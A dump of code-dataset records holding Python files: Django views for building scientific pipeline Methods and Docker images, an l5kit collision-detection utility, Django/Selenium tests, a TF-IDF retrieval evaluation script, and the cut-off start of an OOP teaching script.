user=creating_user,\n threads=method_form.cleaned_data[\"threads\"],\n memory=method_form.cleaned_data[\"memory\"]\n )\n new_method.save()\n\n new_method.grant_from_json(method_form.cleaned_data[\"permissions\"])\n\n # Bind dependencies.\n for i in range(len(dep_forms)):\n if dep_forms[i] is None:\n continue\n try:\n on_revision = CodeResourceRevision.objects.get(\n pk=dep_forms[i].cleaned_data[\"revisions\"])\n dependency = MethodDependency(\n method=new_method,\n requirement=on_revision,\n path=dep_forms[i].cleaned_data[\"path\"],\n filename=dep_forms[i].cleaned_data[\"filename\"]\n )\n dependency.full_clean()\n dependency.save()\n except ValidationError as e:\n dep_forms[i].add_error(None, e)\n raise e\n\n # Attempt to make in/outputs.\n num_outputs = len(output_forms)\n if num_outputs == 0:\n method_form.add_error(None, \"You must specify at least one output.\")\n raise ValidationError(\"You must specify at least one output.\")\n\n for xput_type in (\"in\", \"out\"):\n curr_forms = input_forms\n if xput_type == \"out\":\n curr_forms = output_forms\n\n for form_tuple in curr_forms:\n t_form = form_tuple[0]\n xs_form = form_tuple[1]\n dataset_name = t_form.cleaned_data[\"dataset_name\"]\n cdt_id = xs_form.cleaned_data[\"compounddatatype\"]\n\n if dataset_name == '' and cdt_id == '':\n # ignore blank form\n continue\n\n my_compound_datatype = None\n min_row = None\n max_row = None\n if cdt_id != '__raw__':\n try:\n my_compound_datatype = CompoundDatatype.objects.get(pk=cdt_id)\n min_row = xs_form.cleaned_data[\"min_row\"]\n max_row = xs_form.cleaned_data[\"max_row\"]\n except (ValueError, CompoundDatatype.DoesNotExist) as e:\n xs_form.add_error(\"compounddatatype\", e)\n raise e\n\n curr_xput = new_method.create_xput(\n dataset_name=dataset_name,\n compounddatatype=my_compound_datatype,\n row_limits=(min_row, max_row),\n input=(xput_type == \"in\"),\n clean=False\n )\n\n if cdt_id != \"__raw__\":\n try:\n curr_xput.structure.clean()\n except ValidationError as e:\n xs_form.add_error(None, e)\n raise e\n\n try:\n curr_xput.clean()\n except ValidationError as e:\n t_form.add_error(None, e)\n raise e\n\n try:\n new_method.complete_clean()\n except ValidationError as e:\n method_form.add_error(None, e)\n raise e\n\n except ValidationError:\n return None\n\n return new_method\n\n\ndef _method_forms_check_valid(family_form, method_form, dep_forms,\n input_form_tuples, output_form_tuples):\n \"\"\"\n Helper that validates all forms returned from create_method_forms.\n \"\"\"\n in_xput_forms, in_struct_forms = zip(*input_form_tuples)\n out_xput_forms, out_struct_forms = zip(*output_form_tuples)\n all_forms = ([family_form] + [method_form] + dep_forms +\n list(in_xput_forms) + list(in_struct_forms) +\n list(out_xput_forms) + list(out_struct_forms))\n return all(x.is_valid() for x in all_forms)\n\n\n@login_required\n@user_passes_test(developer_check)\ndef method_view(request, pk):\n \"\"\"\n View a Method or edit its metadata/permissions.\n \"\"\"\n method = Method.check_accessible(pk, request.user)\n addable_users, addable_groups = method.other_users_groups()\n addable_users, addable_groups = method.family.intersect_permissions(\n addable_users,\n addable_groups)\n if method.revision_parent is not None:\n addable_users, addable_groups = (\n method.revision_parent.intersect_permissions(addable_users,\n addable_groups))\n if method.driver is not None:\n addable_users, addable_groups = method.driver.intersect_permissions(\n addable_users,\n addable_groups)\n if method.docker_image is not None:\n addable_users, addable_groups = (\n method.docker_image.intersect_permissions(addable_users,\n addable_groups))\n for dep in method.dependencies.all():\n addable_users, addable_groups = dep.requirement.intersect_permissions(addable_users, addable_groups)\n for xput in itertools.chain(method.inputs.all(), method.outputs.all()):\n xput_cdt = xput.get_cdt()\n if xput_cdt is not None:\n addable_users, addable_groups = xput_cdt.intersect_permissions(addable_users, addable_groups)\n\n if request.method == 'POST':\n # We are attempting to update the Method's metadata/permissions.\n method_form = MethodDetailsForm(\n request.POST,\n addable_users=addable_users,\n addable_groups=addable_groups,\n instance=method\n )\n\n if method_form.is_valid():\n try:\n method.revision_name = method_form.cleaned_data[\"revision_name\"]\n method.revision_desc = method_form.cleaned_data[\"revision_desc\"]\n method.save()\n method.grant_from_json(method_form.cleaned_data[\"permissions\"])\n method.clean()\n\n # Success -- go back to the CodeResource page.\n return HttpResponseRedirect('/methods/{}'.format(method.family.pk))\n except (AttributeError, ValidationError, ValueError) as e:\n LOGGER.exception(e.message)\n method_form.add_error(None, e)\n\n else:\n method_form = MethodDetailsForm(\n addable_users=addable_users,\n addable_groups=addable_groups,\n initial={\n \"revision_name\": method.revision_name,\n \"revision_desc\": method.revision_desc\n }\n )\n\n t = loader.get_template(\"method/method_view.html\")\n c = {\n \"method\": method,\n \"method_form\": method_form,\n \"is_owner\": method.user == request.user,\n \"is_admin\": admin_check(request.user)\n }\n return HttpResponse(t.render(c, request))\n\n\n@login_required\n@user_passes_test(developer_check)\ndef method_new(request):\n \"\"\"\n Generate/validate/process forms creating a new MethodFamily and initial Method.\n\n Allows for an arbitrary number of input and output forms.\n \"\"\"\n return _method_creation_helper(request, method_family=None)\n\n\n@login_required\n@user_passes_test(developer_check)\ndef method_add(request, pk):\n \"\"\"\n Generate/validate/process forms for adding a Method to an existing MethodFamily.\n\n Allows for an arbitrary number of input and output forms.\n\n [pk] : primary key of the MethodFamily that this Method is being added to.\n \"\"\"\n this_family = MethodFamily.check_accessible(pk, request.user)\n return _method_creation_helper(request, method_family=this_family)\n\n\ndef _method_creation_helper(request, method_family=None):\n \"\"\"\n Helper for method_new and method_add.\n\n [request]: the request that actually came in.\n [method_family]: the MethodFamily to add to if applicable, None otherwise.\n \"\"\"\n creating_user = request.user\n\n if method_family:\n header = \"Add a new Method to MethodFamily '%s'\" % method_family.name\n else:\n header = 'Start a new MethodFamily with an initial Method'\n t = loader.get_template('method/method.html')\n if request.method == 'POST':\n family_form, method_form, dep_forms,\\\n input_form_tuples, output_form_tuples,\\\n query_dict = create_method_forms(request.POST, creating_user, family=method_family)\n forms_are_valid = _method_forms_check_valid(family_form,\n method_form, dep_forms,\n input_form_tuples, output_form_tuples)\n display_shebang_button = query_dict[\"SHOW_SHEBANG_FIELD\"]\n shebang_ok = query_dict[\"SHEBANG_OK\"]\n if not (forms_are_valid and shebang_ok):\n # Bail out now if a) the forms are invalid, or we need to allow\n # the user to override a missing shebang in the driver code_resource\n if not dep_forms:\n dep_forms = [MethodDependencyForm(user=creating_user, auto_id='id_%s_0')]\n c = {'show_shebang_button': display_shebang_button,\n 'family_form': family_form,\n 'method_form': method_form,\n 'dep_forms': dep_forms,\n 'input_forms': input_form_tuples,\n 'output_forms': output_form_tuples,\n 'family': method_family,\n 'header': header,\n 'docker_default': DockerImage.DEFAULT_IMAGE}\n return HttpResponse(t.render(c, request))\n else:\n # We are happy with the input, now attempt to build the Method and\n # its associated MethodFamily (if necessary), inputs, and outputs.\n just_created = create_method_from_forms(family_form, method_form,\n dep_forms, input_form_tuples,\n output_form_tuples, creating_user,\n family=method_family)\n if just_created is None:\n # creation failed: the forms have been modded by create_method_from_forms\n # so just show the user these.\n if not dep_forms:\n dep_forms = [MethodDependencyForm(user=creating_user, auto_id='id_%s_0')]\n c = {'show_shebang_button': display_shebang_button,\n 'family_form': family_form,\n 'method_form': method_form,\n 'dep_forms': dep_forms,\n 'input_forms': input_form_tuples,\n 'output_forms': output_form_tuples,\n 'family': method_family,\n 'header': header + \": ERROR\",\n 'docker_default': DockerImage.DEFAULT_IMAGE}\n return HttpResponse(t.render(c, request))\n else:\n # Success!\n return HttpResponseRedirect('/methods/{}'.format(just_created.family.pk), request)\n else:\n # not a POST: Just prepare a blank set of forms for rendering.\n family_form = MethodFamilyForm()\n method_form = MethodForm(user=creating_user)\n\n dep_forms = [MethodDependencyForm(user=creating_user, auto_id='id_%s_0')]\n input_form_tuples = [\n (TransformationXputForm(auto_id='id_%s_in_0'),\n XputStructureForm(user=creating_user, auto_id='id_%s_in_0'))\n ]\n output_form_tuples = [\n (TransformationXputForm(auto_id='id_%s_out_0'),\n XputStructureForm(user=creating_user, auto_id='id_%s_out_0'))\n ]\n c = {'show_shebang_button': False,\n 'family_form': family_form,\n 'method_form': method_form,\n 'dep_forms': dep_forms,\n 'input_forms': input_form_tuples,\n 'output_forms': output_form_tuples,\n 'family': method_family,\n 'header': header,\n 'docker_default': DockerImage.DEFAULT_IMAGE}\n return HttpResponse(t.render(c, request))\n\n\n@login_required\n@user_passes_test(developer_check)\ndef method_revise(request, pk):\n \"\"\"\n Add a revision of an existing Method. revision_parent is defined by the\n previous version.\n \"\"\"\n t = loader.get_template('method/method.html')\n c = {}\n creating_user = request.user\n\n # Retrieve the most recent member of this Method's family.\n parent_method = Method.check_accessible(pk, creating_user)\n family = parent_method.family\n\n # Retrieve the most recent revision of the corresponding CR.\n parent_revision = parent_method.driver\n if not parent_revision:\n this_code_resource = None\n all_revisions = []\n else:\n this_code_resource = parent_revision.coderesource\n # Filter the available revisions by user.\n all_revisions = CodeResourceRevision.filter_by_user(\n creating_user,\n queryset=this_code_resource.revisions.all()).order_by('-revision_DateTime')\n\n parent_container = parent_method.container\n if not parent_container:\n this_container_family = None\n all_containers = []\n else:\n this_container_family = parent_container.family\n all_containers = Container.filter_by_user(\n creating_user,\n queryset=this_container_family.containers.all())\n\n if request.method == 'POST':\n # Because there is no CodeResource specified, the second value is of type MethodReviseForm.\n family_form, method_revise_form,\\\n dep_forms, input_form_tuples,\\\n output_form_tuples, _ = create_method_forms(request.POST, creating_user, family=family)\n if not _method_forms_check_valid(family_form, method_revise_form, dep_forms,\n input_form_tuples, output_form_tuples):\n # Bail out now if there are any problems.\n c.update(\n {\n 'coderesource': this_code_resource,\n 'containerfamily': this_container_family,\n 'method_revise_form': method_revise_form,\n 'dep_forms': dep_forms,\n 'input_forms': input_form_tuples,\n 'output_forms': output_form_tuples,\n 'family': family,\n 'family_form': family_form,\n 'parent': parent_method,\n 'docker_default': DockerImage.DEFAULT_IMAGE\n })\n return HttpResponse(t.render(c, request))\n\n # Next, attempt to build the Method and add it to family.\n create_method_from_forms(\n family_form, method_revise_form, dep_forms, input_form_tuples, output_form_tuples, creating_user,\n family=family, parent_method=parent_method\n )\n if _method_forms_check_valid(family_form, method_revise_form, dep_forms,\n input_form_tuples, output_form_tuples):\n # Success!\n return HttpResponseRedirect('/methods/{}'.format(family.pk))\n\n else:\n # Initialize forms with values of parent Method.\n family_form = MethodFamilyForm({\"name\": family.name, \"description\": family.description})\n parent_users_allowed = [x.username for x in parent_method.users_allowed.all()]\n parent_groups_allowed = [x.name for x in parent_method.groups_allowed.all()]\n method_revise_form = MethodReviseForm(\n initial={\n \"revision_desc\": parent_method.revision_desc,\n \"driver_revisions\": parent_revision and parent_revision.pk,\n \"docker_image\": parent_method.docker_image_id,\n \"reusable\": parent_method.reusable,\n \"threads\": parent_method.threads,\n \"memory\": parent_method.memory,\n \"permissions\": [parent_users_allowed, parent_groups_allowed]\n })\n\n dependencies = parent_method.dependencies.all()\n dep_forms = []\n for i, dependency in enumerate(dependencies):\n its_crv = dependency.requirement\n its_cr = its_crv.coderesource\n dep_form = MethodDependencyForm(\n user=creating_user,\n auto_id='id_%s_'+str(i),\n initial={\n 'coderesource': its_cr.pk,\n 'revisions': its_crv.pk,\n 'path': dependency.path,\n 'filename': dependency.filename\n }\n )\n dep_forms.append(dep_form)\n # If the parent Method has no dependencies, add a blank form.\n if len(dep_forms) == 0:\n dep_forms.append(MethodDependencyForm(user=creating_user, auto_id='id_%s_0'))\n\n xput_forms = []\n inputs = parent_method.inputs.order_by(\"dataset_idx\")\n outputs = parent_method.outputs.order_by(\"dataset_idx\")\n for xput_type, xputs in ((\"in\", inputs), (\"out\", outputs)):\n forms = []\n for xput in xputs:\n tx_form = TransformationXputForm(auto_id='id_%s_{}_{}'.format(xput_type, len(forms)),\n initial={'dataset_name': xput.dataset_name,\n 'dataset_idx': xput.dataset_idx})\n if xput.has_structure:\n structure = xput.structure\n xs_form = XputStructureForm(user=creating_user,\n auto_id='id_%s_{}_{}'.format(xput_type, len(forms)),\n initial={'compounddatatype': structure.compounddatatype.id,\n 'min_row': structure.min_row,\n 'max_row': structure.max_row})\n else:\n xs_form = XputStructureForm(user=creating_user,\n auto_id='id_%s_{}_{}'.format(xput_type, len(forms)),\n initial={'compounddatatype': '__raw__'})\n\n forms.append((tx_form, xs_form))\n xput_forms.append(forms)\n\n input_form_tuples, output_form_tuples = xput_forms\n # if previous Method has no inputs, provide blank forms\n if len(input_form_tuples) == 0:\n tx_form = TransformationXputForm(auto_id='id_%s_in_0')\n xs_form = XputStructureForm(user=creating_user, auto_id='id_%s_in_0')\n input_form_tuples.append((tx_form, xs_form))\n\n method_revise_form.fields['driver_revisions'].widget.choices = [\n (str(x.id), '{}: {}'.format(x.revision_number, x.revision_name)) for x in all_revisions\n ]\n method_revise_form.fields['container'].widget.choices = [\n (str(x.id), x.tag) for x in all_containers]\n c.update(\n {\n 'coderesource': this_code_resource,\n 'containerfamily': this_container_family,\n 'method_form': method_revise_form,\n 'dep_forms': dep_forms,\n 'input_forms': input_form_tuples,\n 'output_forms': output_form_tuples,\n 'family': family,\n 'family_form': family_form,\n 'parent': parent_method,\n 'docker_default': DockerImage.DEFAULT_IMAGE\n }\n )\n return HttpResponse(t.render(c, request))\n\n\n@login_required\n@user_passes_test(developer_check)\ndef docker_images(request):\n \"\"\"\n Display a list of all MethodFamily objects in database.\n \"\"\"\n t = loader.get_template(\"method/docker_images.html\")\n c = {\n \"is_user_admin\": admin_check(request.user)\n }\n return HttpResponse(t.render(c, request))\n\n\n@login_required\n@user_passes_test(developer_check)\ndef docker_image_add(request):\n if request.method != 'POST':\n image_form = DockerImageForm()\n else:\n image = DockerImage(user=request.user)\n image_form = DockerImageForm(request.POST, instance=image)\n\n try:\n if image_form.is_valid():\n image.build()\n image_form.save()\n image.grant_from_json(image_form.cleaned_data[\"permissions\"])\n\n return HttpResponseRedirect('/docker_images')\n except CalledProcessError as ex:\n image_form.add_error(None, ex.output)\n except ValueError:\n # All forms have the appropriate errors attached.\n pass\n\n t = loader.get_template('method/docker_image_add.html')\n c = {\n 'image_form': image_form,\n }\n return HttpResponse(t.render(c, request))\n\n\n@login_required\n@user_passes_test(developer_check)\ndef docker_image_view(request, image_id):\n image = DockerImage.check_accessible(image_id, request.user)\n\n addable_users, addable_groups = image.other_users_groups()\n\n image_form = DockerImageForm(\n request.POST if request.method == 'POST' else None,\n addable_users=addable_users,\n addable_groups=addable_groups,\n instance=image)\n for field in ('name', 'tag', 'git'):\n image_form.fields[field].disabled = True\n\n if request.method == 'POST':\n try:\n image_form.save()\n image.grant_from_json(image_form.cleaned_data[\"permissions\"])\n return HttpResponseRedirect('/docker_images')\n except ValueError:\n # Form has errors attached.\n pass\n\n t = loader.get_template(\"method/docker_image_view.html\")\n c = {\n \"docker_image\": image,\n \"docker_image_form\": image_form,\n \"is_owner\": image.user == request.user,\n \"is_admin\": admin_check(request.user)\n }\n return HttpResponse(t.render(c, request))\n","sub_path":"kive/method/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":44213,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"634451583","text":"from typing import Tuple\n\nimport numpy as np\nfrom shapely.geometry import LineString, Polygon\n\n\ndef _get_boundingbox(centroid: np.ndarray, yaw: float, extent: np.ndarray) -> Polygon:\n x, y = centroid[0], centroid[1]\n sin, cos = np.sin(yaw), np.cos(yaw)\n width, length = extent[0] / 2, extent[1] / 2\n\n x1, y1 = (x + width * cos - length * sin, y + width * sin + length * cos)\n x2, y2 = (x + width * cos + length * sin, y + width * sin - length * cos)\n x3, y3 = (x - width * cos + length * sin, y - width * sin - length * cos)\n x4, y4 = (x - width * cos - length * sin, y - width * sin + length * cos)\n return Polygon([[x1, y1], [x2, y2], [x3, y3], [x4, y4]])\n\n\ndef _get_sides(bbox: Polygon) -> Tuple[LineString, LineString, LineString, LineString]:\n (x1, y1), (x2, y2), (x3, y3), (x4, y4) = bbox.exterior.coords[:-1]\n return (\n LineString([(x1, y1), (x2, y2)]),\n LineString([(x3, y3), (x4, y4)]),\n LineString([(x1, y1), (x4, y4)]),\n LineString([(x2, y2), (x3, y3)]),\n )\n\n\ndef within_range(ego_centroid: np.ndarray, ego_extent: np.ndarray, agents: np.ndarray) -> np.ndarray:\n agent_centroids = agents[\"centroid\"]\n agent_extents = agents[\"extent\"]\n distance = np.linalg.norm(ego_centroid - agent_centroids, axis=-1)\n max_range = 0.5 * (np.linalg.norm(ego_extent[:2]) + np.linalg.norm(agent_extents[:, 2], axis=-1))\n return agents[distance < max_range]\n\n\ndef detect_collision(\n pred_centroid: np.ndarray, pred_yaw: float, pred_extent: np.ndarray, target_agents: np.ndarray\n) -> Tuple[str, str]:\n \"\"\"\n Computes whether a collision occurred between ego and any another agent.\n Also computes the type of collision: rear, front, or side.\n For this, we compute the intersection of ego's four sides with a target\n agent and measure the length of this intersection. A collision\n is classified into a class, if the corresponding length is maximal,\n i.e. a front collision exhibits the longest intersection with\n egos front edge.\n \"\"\"\n ego_bbox = _get_boundingbox(centroid=pred_centroid, yaw=pred_yaw, extent=pred_extent)\n for agent in within_range(pred_centroid, pred_extent, target_agents):\n agent_bbox = _get_boundingbox(agent[\"centroid\"], agent[\"yaw\"], agent[\"extent\"])\n\n if ego_bbox.intersects(agent_bbox):\n front_side, rear_side, left_side, right_side = _get_sides(ego_bbox)\n\n intersection_length_per_side = np.asarray(\n [\n agent_bbox.intersection(front_side).length,\n agent_bbox.intersection(rear_side).length,\n agent_bbox.intersection(left_side).length,\n agent_bbox.intersection(right_side).length,\n ]\n )\n collision_type = [\"front\", \"rear\", \"side\", \"side\"][np.argmax(intersection_length_per_side)]\n return collision_type, agent[\"track_id\"]\n return \"\", \"\"\n","sub_path":"l5kit/l5kit/planning/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":2940,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"502044732","text":"from django.test import TestCase\nfrom world.models import WorldBorder, UserMap, CountryList\nfrom django.core.urlresolvers import reverse\nfrom world.forms import CountryForm, UserMapForm, MapFormSet, CountryEditForm\nfrom selenium import webdriver\nfrom django.test import LiveServerTestCase\nfrom django.contrib.auth.models import User\nfrom selenium.webdriver.common.keys import Keys\nfrom selenium.common.exceptions import TimeoutException\nfrom selenium.webdriver.support.ui import WebDriverWait\nfrom selenium.webdriver.support import expected_conditions as EC\nfrom selenium.webdriver.common.by import By\nimport time\nfrom selenium.webdriver.support.ui import Select\n\n# For tests to be run must create\n# superuser: admin password: testpassword\n# map: testMap\n# firefox installed\n\n\n# Tests on WorldBorder model\nclass WorldBorderTests(TestCase):\n\n # Function to create border entry\n def create_border(self, name=\"testBorder\", area=1, pop2005=\"1\",fips=\"a\",iso2=\"a\",iso3=\"a\",un=\"1\",region=\"1\",subregion=\"1\",lon=\"1\",lat=\"1\", objects=\"2\"):\n return WorldBorder.objects.create(name=name,area=area,pop2005=pop2005,fips=fips,iso2=iso2,iso3=iso3,un=un,region=region,subregion=subregion,lon=lon,lat=lat)\n\n # Tests border creation\n def test_border_creation(self):\n test = self.create_border()\n self.assertTrue(isinstance(test, WorldBorder))\n self.assertEqual(test.__str__(), test.name)\n\n # Tests index view works - as data passed is WorldBorder\n def test_index_view(self):\n test = self.create_border()\n response = self.client.get(reverse('index'))\n self.assertEqual(response.status_code, 200)\n\n# Tests on UserMap model\nclass UserMapsTests(TestCase):\n\n # Function to create map entry\n def create_map(self, mapname=\"testMap\"):\n return UserMap.objects.create(mapname=mapname)\n\n # Tests map creation\n def test_map_creation(self):\n test= self.create_map()\n self.assertTrue(isinstance(test, UserMap))\n self.assertEqual(test.__str__(), test.mapname)\n\n # Tests view that shows maps\n def test_show_maps_view(self):\n test = self.create_map()\n response = self.client.get(reverse('show_maps'))\n self.assertEqual(response.status_code, 200)\n\n # Tests form to create map\n def test_add_map_form(self):\n test = UserMap.objects.create(mapname=\"maptest\")\n data={'mapname' : test.mapname}\n testform = UserMapForm(data=data)\n self.assertTrue(testform.is_valid())\n\n testform = UserMapForm()\n self.assertEqual(testform.is_valid(), False)\n\n# Tests on CountryList Model\nclass CountryListTests(TestCase):\n\n # Function to create CountryList entry\n def create_countrylist(self, layername=\"testlayer\", year=1, layercolour=\"Blue\"):\n return CountryList.objects.create(layername=layername,year=year,layercolour=layercolour)\n\n # Tests CountryList creation\n def test_countrylist_creation(self):\n test = self.create_countrylist()\n self.assertTrue(isinstance(test, CountryList))\n self.assertEqual(test.__str__(), test.layername)\n\n # Tests form to create CountryList\n def test_add_layer_form(self):\n test = CountryList.objects.create(layername=\"testlayer\", year=1)\n data= {'name' : test.layername,'listofcountries' : 'France', 'year' : test.year, 'layercolour' : 'Green'}\n testform = CountryForm(data=data)\n self.assertTrue(testform.is_valid())\n\n testform = CountryForm()\n self.assertEqual(testform.is_valid(), False)\n\n # Tests view that shows layers\n def test_show_layers_view(self):\n test = self.create_countrylist()\n response = self.client.get(reverse('show_layers'))\n self.assertEqual(response.status_code, 200)\n\n# Tests on webpages\n# Selenium test setUp and tearDown from https://realpython.com/blog/python/testing-in-django-part-1-best-practices-and-examples/\nclass NavTestCase(LiveServerTestCase):\n\n # Instantiates selenium firefox driver\n def setUp(self):\n self.selenium = webdriver.Firefox()\n super(NavTestCase, self).setUp()\n\n def tearDown(self):\n self.selenium.quit()\n super(NavTestCase, self).tearDown()\n\n # checks first select is populated with map names\n def test_select_populate(self):\n selenium = self.selenium\n selenium.get('http://localhost:8080/world/')\n time.sleep(20)\n select = Select(selenium.find_element_by_id('map'))\n select.select_by_value(\"testMap\")\n\n # checks second select is populated after first is selected\n def test_second_select(self):\n selenium = self.selenium\n selenium.get('http://localhost:8080/world/')\n time.sleep(2)\n select = Select(selenium.find_element_by_id('map'))\n select.select_by_value(\"testMap\")\n time.sleep(2)\n select = Select(selenium.find_element_by_id('layer'))\n\n # checks navigation to see layers\n def test_layer_nav(self):\n selenium = self.selenium\n selenium.get('http://localhost:8080/world/show_layers/')\n link = selenium.find_element_by_link_text('Edit')\n link.click()\n time.sleep(1)\n selenium.find_element_by_id('id_countrylist')\n\n # checks navigation to see maps\n def test_map_nav(self):\n selenium = self.selenium\n selenium.get('http://localhost:8080/world/show_maps/')\n link = selenium.find_element_by_link_text('Edit')\n link.click()\n time.sleep(1)\n selenium.find_element_by_id('id_mapname')\n\n # checks index navigation\n def test_index_nav(self):\n selenium = self.selenium\n selenium.get('http://localhost:8080/world/')\n link = selenium.find_element_by_link_text('Add Map')\n link.click()\n time.sleep(1)\n\n selenium.find_element_by_id('id_mapname')\n\n # Checks that, when a feature is added to the map, the exportjson button works\n # Proving features can be added as well as the button functionality\n # Works as about:blank will not open unless there are features on the map\n def test_adding_geojson(self):\n selenium = self.selenium\n selenium.get('http://localhost:8080/world/')\n time.sleep(2)\n selenium.find_element_by_name('addFeatureValue').send_keys(\"France\")\n submit = selenium.find_element_by_id('addindividualfeatures')\n time.sleep(1)\n submit.click()\n time.sleep(3)\n json = selenium.find_element_by_id('exportjson')\n json.click()\n time.sleep(1)\n selenium.get('about:blank')\n\n # As per the last function, checks removal of features from the map\n # works as the alert only pops up if there are no map layers\n def test_removing(self):\n selenium = self.selenium\n selenium.get('http://localhost:8080/world/')\n time.sleep(2)\n selenium.find_element_by_name('addFeatureValue').send_keys(\"France\")\n submit = selenium.find_element_by_id('addindividualfeatures')\n time.sleep(1)\n submit.click()\n time.sleep(3)\n clear = selenium.find_element_by_id('clearform')\n clear.click()\n time.sleep(1)\n json = selenium.find_element_by_id('exportjson')\n time.sleep(1)\n json.click()\n time.sleep(1)\n alert=selenium.switch_to_alert()\n alert.accept()\n\n\n# Tests on Admin site\nclass AdminTestCase(LiveServerTestCase):\n\n def setUp(self):\n User.objects.create_superuser(\n username='admin',\n password='testpassword',\n email='admin@example.com'\n )\n\n self.selenium = webdriver.Firefox()\n super(AdminTestCase, self).setUp()\n\n def tearDown(self):\n self.selenium.quit()\n super(AdminTestCase, self).tearDown()\n\n # Checks new users can be added in admin site, also checking admin log on\n def test_register(self):\n selenium = self.selenium\n #Opening the link we want to test\n selenium.get('http://localhost:8080/world/admin/')\n username = selenium.find_element_by_id('id_username')\n password = selenium.find_element_by_id('id_password')\n username.send_keys(\"admin\")\n password.send_keys(\"testpassword\")\n # password.send_keys(Keys.RETURN)\n selenium.find_element_by_xpath('//*[@id=\"login-form\"]/div[3]/input').click()\n password.submit()\n time.sleep(1)\n selenium.get('http://localhost:8080/world/admin/auth/user/add/')\n\n selenium.find_element_by_id('id_username').send_keys(\"test\")\n selenium.find_element_by_name('password1').send_keys(\"test\")\n selenium.find_element_by_name('password2').send_keys(\"test\")\n\n selenium.find_element_by_id(\"user_form\").submit()\n","sub_path":"world/tests.py","file_name":"tests.py","file_ext":"py","file_size_in_byte":8721,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"643131256","text":"from sklearn.feature_extraction.text import TfidfVectorizer\nfrom sklearn.metrics.pairwise import cosine_similarity\nfrom sklearn.metrics import average_precision_score\nimport numpy as np\nimport nltk\nfrom nltk.stem import PorterStemmer\nimport nimfa\nfrom sklearn import preprocessing\nfrom scipy import sparse\n\nenglish_stemmer = PorterStemmer()\nclass StemmedTfidfVectorizer(TfidfVectorizer):\n def build_analyzer(self):\n analyzer = super(TfidfVectorizer, self).build_analyzer()\n return lambda doc: (english_stemmer.stem(w) for w in analyzer(doc))\np10=0.0\np20=0.0\ncorpus = []\nmapscore=0.0\n# prepare corpus and relevance\nf = open(\"./q/\"+str(1)+\".txt\")\ncorpus.append(f.read)\nfor d in range(0,1400):\n f = open(\"./d/\"+str(d+1)+\".txt\")\n corpus.append((f.read()))\n\nfor q in range(1, 226):\n \n relevance = \"\"\n \n # add query to corpus\n f = open(\"./q/\"+str(q)+\".txt\")\n corpus[0]=(f.read())\n # relevance\n f = open(\"./r/\"+str(q)+\".txt\")\n relevance = np.array(list(map(int, filter(None, f.read().split(\"\\n\")))))\n\n #creating tfidf_matrix\n tfidf_vectorizer = StemmedTfidfVectorizer(min_df=1, stop_words='english', analyzer='word', ngram_range=(1,1))\n tfidf_matrix = tfidf_vectorizer.fit_transform(corpus)\n \n #binary array of relevant documents\n truearr=[0]*1400\n sizenow=len(relevance)\n for temper in range(0,sizenow):\n truearr[relevance[temper]-1]=1\n\n # Cosine similarity measure\n csim = np.array(cosine_similarity(tfidf_matrix[0], tfidf_matrix[1:len(corpus)])[0])\n #calculating p@10 and p@20\n count=0.0\n count1=0.0\n top10=csim.argsort()[-10:][::-1]+1\n top20=csim.argsort()[-20:][::-1]+1\n for x in range(0,10):\n for y in range(0,relevance.size):\n if top10[x]==relevance[y]:\n count=count+1\n for x in range(0,20):\n for y in range(0,relevance.size):\n if top20[x]==relevance[y]:\n count1=count1+1\n\n count=count/10.0\n count1=count1/20.0\n p10=p10+count\n p20=p20+count1\n\n #average precision\n cscore = average_precision_score(truearr, csim, average='micro')\n mapscore=mapscore+cscore\n\n\n#average p@10 for all the queries\np10=p10/q\n\n#average p@10 for all the queries\np20=p20/q\n\n#mean average score\nmapscore=mapscore/q\n\n#print (\"MAP = \" + str(mapscore) + \" p@10 = \" + str(p10) + \" p@20 = \" + str(p20) + \"\\n\")","sub_path":"Intermediate results/noprf.py","file_name":"noprf.py","file_ext":"py","file_size_in_byte":2371,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"66903656","text":"##########################################################################################################################################\n# Basically to understand the Class, Inheritance\n# \n# @lessons learned: \n# Python does NOT support method overloading... aka CompileTime Polymorphism...\n# https://www.geeksforgeeks.org/python-method-overloading/\n#\n# @date Sun, 12Jan2020 @ 01:15 AM IST\n# @version 1.0\n# @author VMP Consulting\n#\n##########################################################################################################################################\nclass Shapes():\n myGreetings = \"Hi, Welcome To Coindsyz!!!\"\n def describeSelf(self):\n print(\"\\nHi, This is the class Shapes, and I would be the PARENT class for my subclasses, \" +\n \"viz., Triangle, ReversedTriangle, Square, Rectangle, Forward and Backward slashes...\")\n \n\n #Note: A Private method in python gets defined by preceding doubleunderscore to the method name...for instance, __myMethod(self)\n def __describeSelfPrivate(self, pGreetings):\n print (\"\\n\\nHi, I'm an overloaded method (note: OVERLOADING (of methods) always happens WITHIN THE SAME CLASS) and \" +\n \"the greeting message I've received is : \" + pGreetings + \" and I happen to have a PRIVATE access, which means\" +\n \"I'm not accessible beyond this boundaries of this class, either by it's child classes or other classes outside of this one...\")\n \n def callAllMethodsOfTheClass(self):\n describeSelf()\n __describeSelfPrivate(myGreetings)\n\n# The overloaded version of the method describeSelf() are commented out, since, we understood now that, Python does not support method overloading...\n# def describeSelf(self, pGreetings, pName):\n# print (\"\\nHi, I'm one more version of overloaded method but, the difference here is, my access is PROTECTED, which means, I'm available to \" +\n# \"all of the child classes, which are getting inherited from me, the parent class, called Shapes...\\n\" +\n# \"do note that, just because I'm having one more extra parameter from my sibling method, this overloading becomes possible...\" +\n# \"Otherwise, If I happen to have a same set of parameters as my sibiling method, you would get an compilation error...\" +\n# \"so, do note that, only when the signature of the method happen to be different, the OVERLOADING becomes a possibility...\" +\n# \"methods, with same signature, can never be called/make overloading possible...\")\n \nclass Triangle(Shapes):\n def describeSelf(self):\n print(\"\\nHi, This is the Triangle class, which is the CHILD class of my PARENT class called SHAPES...\" +\n \"and by RETAINING THE SAME METHOD SIGNATURE as that of my PARENT class, I would be OVERRIDING the implementation of this \" +\n \"method, which has my own (child) version of the implementation, which is different from the implementation of my PARENT class... \")\n \nclass Square (Shapes):\n def printYourShape():\n print (\"\\nHi, I'm A Square!!!\")\n \n\nmyGreetings = \"Hi, Welcome To Coindsyz!!!\"\nmyName = \"M. Nachimuthu\"\nprint (\"OOPS Training Version 